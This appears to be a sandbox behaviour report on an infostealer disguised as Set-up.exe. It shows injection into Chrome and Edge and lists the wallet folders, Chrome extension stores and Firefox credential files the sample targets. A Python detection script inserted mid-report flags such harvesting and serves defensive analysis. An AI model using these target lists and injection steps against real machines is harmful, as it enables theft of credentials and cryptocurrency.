Source: C:\Users\user\Desktop\Set-up.exe Thread register set: target process: 5760
Source: C:\Users\user\Desktop\Set-up.exe Thread register set: target process: 1380
Source: C:\Users\user\Desktop\Set-up.exe Thread register set: target process: 2444
Source: C:\Users\user\Desktop\Set-up.exe Thread register set: target process: 3832
Source: C:\Users\user\Desktop\Set-up.exe Thread register set: target process: 4544
Source: C:\Users\user\Desktop\Set-up.exe Thread register set: target process: 4988
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0240000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0250000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0260000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230008
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230010
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230018
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230020
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230028
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230030
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0270000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 0
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401B0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401C0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0008
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0010
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0018
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0020
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0028
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0030
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401D0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384180000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384190000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841A0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170008
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170010
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170018
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170020
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841C0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEE0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEF0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF00000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0008
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0010
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0018
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0020
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF20000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687990000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879A0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879B0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980008
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980010
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980018
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980020
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879D0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF390000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3A0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3B0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380008
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380010
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380018
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380020
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3D0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF870000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF880000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF890000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860008
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860010
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860018
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860020
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF8B0000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B140000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B150000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B160000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130000
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130008
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130010
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130018
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130020
Source: C:\Users\user\Desktop\Set-up.exe Memory written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B180000
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: Set-up.exe PID: 7468, type: MEMORYSTR
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Roaming\Electrum\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Roaming\ElectronCash\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Electrum\wallets\??\C:\Users\user\AppData\Roaming\Electrum\wallets\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Electrum\wallets\??\C:\Users\All Users\AppData\Roaming\Electrum\wallets\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Electrum\wallets\??\C:\Users\Default\AppData\Roaming\Electrum\wallets\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Electrum\wallets\??\C:\Users\Default User\AppData\Roaming\Electrum\wallets\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Electrum\wallets\??\C:\Users\Public\AppData\Roaming\Electrum\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Exodus\??\C:\Users\user\AppData\Roaming\Exodus\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Exodus\??\C:\Users\All Users\AppData\Roaming\Exodus\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Exodus\??\C:\Users\Default\AppData\Roaming\Exodus\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Exodus\??\C:\Users\Default User\AppData\Roaming\Exodus\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Exodus\??\C:\Users\Public\AppData\Roaming\Exodus
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Ethereum\??\C:\Users\user\AppData\Roaming\Ethereum\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Ethereum\??\C:\Users\All Users\AppData\Roaming\Ethereum\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Ethereum\??\C:\Users\Default\AppData\Roaming\Ethereum\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Ethereum\??\C:\Users\Default User\AppData\Roaming\Ethereum\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Ethereum\??\C:\Users\Public\AppData\Roaming\Ethereum
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Roaming\Exodus
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Roaming\Ethereum
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Roaming\Coinomi\Coinomi\wallets
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Roaming\MultiDoge
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: keystore
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Roaming\Ledger Live
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Publicp.inir......useruser\??\C:\Users\user\??\C:\Users\userAll UsersAll Users\??\C:\Users\All Users\??\C:\Users\All UsersDefaultDefault\??\C:\Users\Default\??\C:\Users\DefaultDefault UserDefault User\??\C:\Users\Default User\??\C:\Users\Default Userdesktop.inidesktop.ini\??\C:\Users\desktop.iniPublicPublic\??\C:\Users\Public\??\C:\Users\Public\??\C:\Users\user\AppData\??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\All Users\AppData\??\C:\Users\All Users\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\All Users\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default\AppData\??\C:\Users\Default\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default User\AppData\??\C:\Users\Default User\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Default User\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Public\AppData\??\C:\Users\Public\AppData\Roaming\Electrum-LTC\wallets\??\C:\Users\Public\AppData\Roaming\Electrum-LTC\wallets@I
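The wallet directories in the memory strings above and the long run of Chrome "Local Extension Settings" and Firefox profile opens listed below are the evidence a detection engineer turns into a hunting rule: a non-browser process enumerating many distinct extension stores, wallet folders and Firefox credential files in one pass. The following is an added example, not Joe Sandbox code and not the sample's own logic. It parses "File opened" lines in the shape this report uses, classifies each path against the artifact classes the report shows, and flags processes that match. The browser allowlist, the threshold of five distinct extension IDs, the inclusion of key4.db, and the sample event list (extension and logins.json opens copied from the report, plus a constructed Exodus open and a constructed benign chrome.exe open) are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Artifact classes this report shows Set-up.exe reaching for.
# Chrome extension IDs are 32 characters drawn from the letters a-p.
EXT_RE = re.compile(r"\\Local Extension Settings\\([a-p]{32})(?:\\|$)")
# Wallet directories taken from the memory strings in the report.
WALLET_RE = re.compile(
    r"\\AppData\\Roaming\\(Exodus|Ethereum|Binance|Coinomi|MultiDoge|Ledger Live|Electrum-LTC)(?:\\|$)"
)
# Firefox profile files seen in the report (key4.db is an assumption added here:
# it is the current Firefox key store and is not listed on this page).
FIREFOX_RE = re.compile(
    r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\"
    r"(logins\.json|key3\.db|key4\.db|cert9\.db|cookies\.sqlite|formhistory\.sqlite)$"
)
# Assumed allowlist: browsers legitimately open their own profile stores.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Shape of the "File opened" evidence lines in this report.
REPORT_LINE_RE = re.compile(
    r"^Source: (?P<proc>.+?) File opened: (?P<path>.+?)(?: Jump to behavior)?$"
)


def parse_report_lines(lines):
    """Turn 'File opened' evidence lines into (process, path) events; other lines are skipped."""
    events = []
    for line in lines:
        m = REPORT_LINE_RE.match(line.strip())
        if m:
            events.append((m.group("proc"), m.group("path")))
    return events


def classify_path(path):
    """Return (kind, name) when a path hits one of the artifact classes, else (None, None)."""
    for kind, rx in (("extension", EXT_RE), ("wallet", WALLET_RE), ("firefox", FIREFOX_RE)):
        m = rx.search(path)
        if m:
            return kind, m.group(1)
    return None, None


def flag_stealer_activity(events, ext_threshold=5):
    """Return {process: [reasons]} for non-browser processes whose opens look like harvesting.

    One extension store open is ordinary noise; a non-browser process walking many
    distinct extension IDs, or touching wallet folders or Firefox credential files,
    is the pattern the report documents.
    """
    per_proc = defaultdict(lambda: {"extension": set(), "wallet": set(), "firefox": set()})
    for proc, path in events:
        kind, name = classify_path(path)
        if kind:
            per_proc[proc][kind].add(name)

    alerts = {}
    for proc, found in per_proc.items():
        if proc.rsplit("\\", 1)[-1].lower() in BROWSERS:
            continue  # assumed benign: a browser reading its own profile
        reasons = []
        if len(found["extension"]) >= ext_threshold:
            reasons.append(f"opened {len(found['extension'])} distinct Chrome extension stores")
        if found["wallet"]:
            reasons.append("touched wallet data: " + ", ".join(sorted(found["wallet"])))
        if found["firefox"]:
            reasons.append("touched Firefox credential/cookie files: " + ", ".join(sorted(found["firefox"])))
        if reasons:
            alerts[proc] = reasons
    return alerts


# Constructed sample: five extension opens and one logins.json open copied from the
# report, plus an Exodus open and a benign chrome.exe open that are made up here.
_SRC = r"Source: C:\Users\user\Desktop\Set-up.exe File opened: "
_EXT = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings"
SAMPLE_LINES = [
    _SRC + _EXT + r"\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior",
    _SRC + _EXT + r"\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior",
    _SRC + _EXT + r"\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior",
    _SRC + _EXT + r"\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior",
    _SRC + _EXT + r"\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior",
    _SRC + r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json Jump to behavior",
    _SRC + r"C:\Users\user\AppData\Roaming\Exodus Jump to behavior",  # constructed event
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: "
    + _EXT + r"\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior",  # constructed benign event
    "Source: Set-up.exe String found in binary or memory: seed.seco",  # not a file-open line
]

if __name__ == "__main__":
    for proc, reasons in flag_stealer_activity(parse_report_lines(SAMPLE_LINES)).items():
        print(proc)
        for r in reasons:
            print("  -", r)
```

On a real endpoint the same logic runs over file-open telemetry (Sysmon event ID 11 does not cover reads, so an EDR or ETW file-access source is needed); the threshold matters because a single non-browser tool touching one extension directory is common, while the sample above walks well over a hundred of them.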
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kbdcddcmgoplfockflacnnefaehaiocb Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eklfjjkfpbnioclagjlmklgkcfmgmbpg Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcjginnbdlkdnnahogchmeidnmfckjom Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfcl Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kgdijkcfiglijhaglibaidbipiejjfdp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojhpaddibjnpiefjkbhkfiaedepjheca Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbkfoedolllekgbhcbcoahefnbanhhlh Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpd Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdfigkbdjmhpdgffnbdbicdmimfikfig Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffd Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gafhhkghbfjjkeiendhlofajokpaflmk Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\All Users\AppData\Roaming\Mozilla\Firefox\Profiles\Local State Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\llalnijpibhkmpdamakhgmcagghgmjab Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
